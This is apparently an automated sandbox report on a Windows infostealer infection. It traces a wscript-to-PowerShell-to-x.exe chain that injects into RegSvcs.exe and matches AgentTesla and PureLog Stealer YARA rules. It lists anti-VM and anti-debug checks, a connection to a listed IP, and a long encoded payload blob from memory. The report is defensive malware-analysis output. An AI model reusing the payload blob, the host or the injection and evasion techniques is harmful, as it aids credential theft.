              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595577Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595249Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
              Source: RegSvcs.exe, 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
              Source: RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vmware
              Source: x.exe, 00000005.00000002.1725663562.00000000009EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000001.00000002.1775167248.000001B50AAF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1769036659.000001B50AAEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
              Source: wscript.exe, 00000001.00000003.1773587473.000001B50CE18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1775625595.000001B50CE18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1775167248.000001B50AAF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1769036659.000001B50AAEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: x.exe, 00000005.00000002.1725663562.00000000009EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000001.00000003.1772298991.000001B50D4A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SH8TcH6ckSGAey0foxT6X/+x8cGjljpn8apO3DGwBw6tSnVWAsXZR3n1u72TFP8gVmPNxE4l7jBSnNbopZN5/GtNIvPOWfnKMjcU3z8dL/YcFJS5Y94w7CmnnJnmm64BeeGak7WKkIr258GLCOj3ZbCjAJQw19RJ4K5xkO8yRF6a9FEABClayjLSfQ/nqfNswcruZI+kXx/6bCZdHzLUqUgoEet7ujf5aVAUjTHxNPcTKpsUlKBrJvEPdyHYWvrWF1Bhjtj3+6cWvU/QZ2/866jAFIgMJKss0Irbn3ps8DEr15TTuga3BGINKxcOUpF5vLQRvNp0P16/nDGNEstoTVbYHhR8n+26tikighPH83CawD51iRkOIt4oYeSKfZF9lH4Dx9AFcBRkFiNDGBwiBByxDTPp9LftNRlaSVjyhnOBj390B4AWY2MxdQ7oh7rW2Bx9+cBnRcjz76N/Jsbh1NFucCsWUyos+1p+66YfMu7b1sQhekKiNQocwNjVVgw/D8RBblxjTl7lvShRSgDGlf/czDOnrCxdOZ4cxpGn0vNHtDtWtvfWs8raqniNWX4QN8k942GipVI6+9y9PLHVmc4V9CuQoP1U7vwqWdqLMn3KJT16IHJ3KXsyYwzrNEP1i8V8flgH/rqgsrSnfy5eUX6FVUlOz/w5CEtC4KgO0pcW67r17tSCjFIDL41p8lpSPTF6SecWBy+5bkgNaNlKtSHKk/AePuFZJMM5bEI+nhGB3Uxu//vGWKL4VTU3gCjznyneisYwX/06C8PqwxodtZLoDlFfUCq83dm3hxwLvH/Xyk2BC0sYzvO5x8lsJELQTqG/ejA1rGWwkR52gYifXHMJ9Q1Ujio6ZLh/YtKu97S2ZgtRweGQ1wsFJKbqXk7IfhsGMCghAn6fU3A5OM08sJ/Bk1l1O55E6gxeKA6Lrb4hM+BtE2zR9OvmWQx0deYF1cLB5LLEug0g9U/OJYOZ1uDzkcowhgEXobiYJone0L/MORZtvGbQfc5DHnRxohTxZqyUPm3n4J+1mfFgSXJiIcdX+2BfI3O3E1BLlg+4lehUE99dh7DIZUoidD58tIsatsmOjTxiDMb0V0Zn95zs63uETe598HVEcLoVJwAx0rx7qtPSZ78pKZ0gE0TzJHVTwL/tbQqvkjDmwlonCLHRVMOdHlEcB165qRuFX7TB4kPrZpx3nvTU6sBjv40L/z1D6SVNMnMWCq0sWoWWFgHVaFAil79wYJszd7dNo7yQCn96F13YI3ZWcUhnUAXG+6Fd7QcIfuzJaIdcIvWJf64of6wg1oweK+utGN1vdSynmUEjSxQty/zp/a4bzgIPXR5kOvzqcTkHVKy1L4KPpXr7waczXJQKgS5Hw6olt4WICnr9RTYkAiQ84Co2E6ZVgcaBkHcwjBXiI5SMTr7HX+3I5TduR1HSoDOz+BelUB9tKfajkvSVPnY9GiuEnwGmnw8no3LKirnqeMuWnfz8psAZn2nhwqDuIj+UFHPRB23UXlrtA49rBium5pU4807hJqsz0lidFp3x18k97s31QIx8sAhhsG1jGZSGcE9f112Q+PvRo/43WRIhwmi/CZG1UY7wMZRiD2Ihh5rOzhXP6IG1CeHUB24Bh1F6hK4Mw21ipAUlS+/woJeczWbTkz08szT0yT1mZqY6E2VP5zlQaScXFZJpL1YegaxEvCj6rd/lNfi/o0HURSAas+WKmr2sQxtY1GBcviSPNbXriPsAFkGw85GDLbUbChStWlndtE1Hg8ec04CvNZ+iJhLR0NPzGHW5O+o/Kng3ooN37iinie5NY08Fl8oee9TMjsY/uszw7rMfoWBPE+hMQ19IzZFnh7qqDpZ1YNnnUYGxb7lIIolpeR6oTqNqCdeB4W41Yw0BeuBitakv6ed3YwoDoQK9r8Xzb6kd/eDwoQu7wwcPfbPwQFbaZeCXX812Akir3I5Ntb7aRb6B4gsbQ30Oput3tQBcZmcqfkAQ27BqxxNhUtkHwpsnFq/DuB9ywq1pEu3SOhMxUYPQ0lEFyysfyx8qez7QJttv89e+9K0/kdOnYPgU0qA/kzY7ZDo2QDUEi0XMh22g/cffTO8xfoHFI+CaAayiphB+X/Gg3lsGEMqrnmaM1zuw1nmK7gPsUChBFMP2kkvp30111C4rnqM1wo7yvCeDY7sm6EJvu5n9v6LYMFK7lOrokdZU7JLYjcWXYUjKAfnmZcF2tKmzv0YPAgztKnteP81s/dI6CFv59IE75cQThNC479WJhgd6WEMYnDNtwMU5h2qrFefIcukWAYgWg3nKbxbJj/sHWMeB/YJB4xZ6w1iGypyKlS/VSW76w0Vss0YZyqojMGbQcvqBtlyRykrjGP/NBZoXyU5H3EcEpqa1R5IFPC/tYTJ5krs4CZ4deIRxSWoYzLXgrtackK3/QFWkX6cJzsW+XTMKqaRD0R6unINghcI/wgaoQb5jjT6wvVz3YdXiuRLdUqG1SUCYLRok6iIPF1TCIgZuJo/RvLnkEMMZ8VN3f+/bSfiFBWHz+8+DXeFw5pgwNc3Kopss46MND7gUmzWh8XFiKKR8GKKQF7v0cU21EWFiNnklBdSj4nOo8+t5nDkkQZG1tmUk+Fbsx1Sb6BK2JTY1tTIgQdoKRFHKiycazRnM+wqpzM/AmJe2NpP63C6bc4HFC3HxW/76/o0ZT30TjVpERjddGf5ToGxvC1wiZu8CpodT9PNGT8ruo0B53JU25952H4PPynUJnAe6FCkDDyDgDpv9atB8gD+3q2wC/BpDxzq4Nz8uhbmfe+qeWLD5uOXuCC/dGbuztJ1nsVJLFCR3nwCwKBsfr5jbM8E5yUWX+ZnAejq8eahoAEr0tWFTuIGE4E1IkHJUUtEgho7vZCBJIBkZml8GPJhVBkyWkbgm8r5KR3Sas6P3Ns7j1dj+0xvnSni6VoJAo5z0DfKOWN+1h0kbPUdYv1wJE2JbLKeLhUv67cq0mQO21LPqR8Qsypm6
              Source: wscript.exe, 00000001.00000003.1772213310.000001B50D6A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SH8TcH6ckSGAey0foxT6X/+x8cGjljpn8apO3DGwBw6tSnVWAsXZR3n1u72TFP8gVmPNxE4l7jBSnNbopZN5/GtNIvPOWfnKMjcU3z8dL/YcFJS5Y94w7CmnnJnmm64BeeGak7WKkIr258GLCOj3ZbCjAJQw19RJ4K5xkO8yRF6a9FEABClayjLSfQ/nqfNswcruZI+kXx/6bCZdHzLUqUgoEet7ujf5aVAUjTHxNPcTKpsUlKBrJvEPdyHYWvrWF1Bhjtj3+6cWvU/QZ2/866jAFIgMJKss0Irbn3ps8DEr15TTuga3BGINKxcOUpF5vLQRvNp0P16/nDGNEstoTVbYHhR8n+26tikighPH83CawD51iRkOIt4oYeSKfZF9lH4Dx9AFcBRkFiNDGBwiBByxDTPp9LftNRlaSVjyhnOBj390B4AWY2MxdQ7oh7rW2Bx9+cBnRcjz76N/Jsbh1NFucCsWUyos+1p+66YfMu7b1sQhekKiNQocwNjVVgw/D8RBblxjTl7lvShRSgDGlf/czDOnrCxdOZ4cxpGn0vNHtDtWtvfWs8raqniNWX4QN8k942GipVI6+9y9PLHVmc4V9CuQoP1U7vwqWdqLMn3KJT16IHJ3KXsyYwzrNEP1i8V8flgH/rqgsrSnfy5eUX6FVUlOz/w5CEtC4KgO0pcW67r17tSCjFIDL41p8lpSPTF6SecWBy+5bkgNaNlKtSHKk/AePuFZJMM5bEI+nhGB3Uxu//vGWKL4VTU3gCjznyneisYwX/06C8PqwxodtZLoDlFfUCq83dm3hxwLvH/Xyk2BC0sYzvO5x8lsJELQTqG/ejA1rGWwkR52gYifXHMJ9Q1Ujio6ZLh/YtKu97S2ZgtRweGQ1wsFJKbqXk7IfhsGMCghAn6fU3A5OM08sJ/Bk1l1O55E6gxeKA6Lrb4hM+BtE2zR9OvmWQx0deYF1cLB5LLEug0g9U/OJYOZ1uDzkcowhgEXobiYJone0L/MORZtvGbQfc5DHnRxohTxZqyUPm3n4J+1mfFgSXJiIcdX+2BfI3O3E1BLlg+4lehUE99dh7DIZUoidD58tIsatsmOjTxiDMb0V0Zn95zs63uETe598HVEcLoVJwAx0rx7qtPSZ78pKZ0gE0TzJHVTwL/tbQqvkjDmwlonCLHRVMOdHlEcB165qRuFX7TB4kPrZpx3nvTU6sBjv40L/z1D6SVNMnMWCq0sWoWWFgHVaFAil79wYJszd7dNo7yQCn96F13YI3ZWcUhnUAXG+6Fd7QcIfuzJaIdcIvWJf64of6wg1oweK+utGN1vdSynmUEjSxQty/zp/a4bzgIPXR5kOvzqcTkHVKy1L4KPpXr7waczXJQKgS5Hw6olt4WICnr9RTYkAiQ84Co2E6ZVgcaBkHcwjBXiI5SMTr7HX+3I5TduR1HSoDOz+BelUB9tKfajkvSVPnY9GiuEnwGmnw8no3LKirnqeMuWnfz8psAZn2nhwqDuIj+UFHPRB23UXlrtA49rBium5pU4807hJqsz0lidFp3x18k97s31QIx8sAhhsG1jGZSGcE9f112Q+PvRo/43WRIhwmi/CZG1UY7wMZRiD2Ihh5rOzhXP6IG1CeHUB24Bh1F6hK4Mw21ipAUlS+/woJeczWbTkz08szT0yT1mZqY6E2VP5zlQaScXFZJpL1YegaxEvCj6rd/lNfi/o0HURSAas+WKmr2sQxtY1GBcviSPNbXriPsAFkGw85GDLbUbChStWlndtE1Hg8ec04CvNZ+iJhLR0NPzGHW5O+o/Kng3ooN37iinie5NY08Fl8oee9TMjsY/uszw7rMfoWBPE+hMQ19IzZFnh7qqDpZ1YNnnUYGxb7lIIolpeR6oTqNqCdeB4W41Yw0BeuBitakv6ed3YwoDoQK9r8Xzb6kd/eDwoQu7wwcPfbPwQFbaZeCXX812Akir3I5Ntb7aRb6B4gsbQ30Oput3tQBcZmcqfkAQ27BqxxNhUtkHwpsnFq/DuB9ywq1pEu3SOhMxUYPQ0lEFyysfyx8q
              Source: x.exe, 00000005.00000002.1728264547.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
              Source: RegSvcs.exe, 00000006.00000002.2900238221.00000000059EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_5-86671
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_057011F8 CheckRemoteDebuggerPresent,6_2_057011F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0045A370 BlockInput,5_2_0045A370
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D590
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0040EBD0 LoadLibraryA,GetProcAddress,5_2_0040EBD0
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_02F334C0 mov eax, dword ptr fs:[00000030h]5_2_02F334C0
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_02F33520 mov eax, dword ptr fs:[00000030h]5_2_02F33520
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_02F31E70 mov eax, dword ptr fs:[00000030h]5_2_02F31E70
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_004238DA
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0041F250 SetUnhandledExceptionFilter,5_2_0041F250
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0041A208
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00417DAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EC4008Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00436CD7 LogonUserW,5_2_00436CD7
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D590
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00434418
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,5_2_0043333C
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00446124
              Source: x.exeBinary or memory string: Shell_TrayWnd
              Source: powershell.exe, 00000003.00000002.1741313249.00000244CBE44000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000000.1709542652.0000000000482000.00000002.00000001.01000000.00000008.sdmp, x.exe, 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,6_2_00417A20
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,5_2_004720DB
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00472C3F GetUserNameW,5_2_00472C3F
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_0041E364
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,5_2_0040E500
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5212, type: MEMORYSTR
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
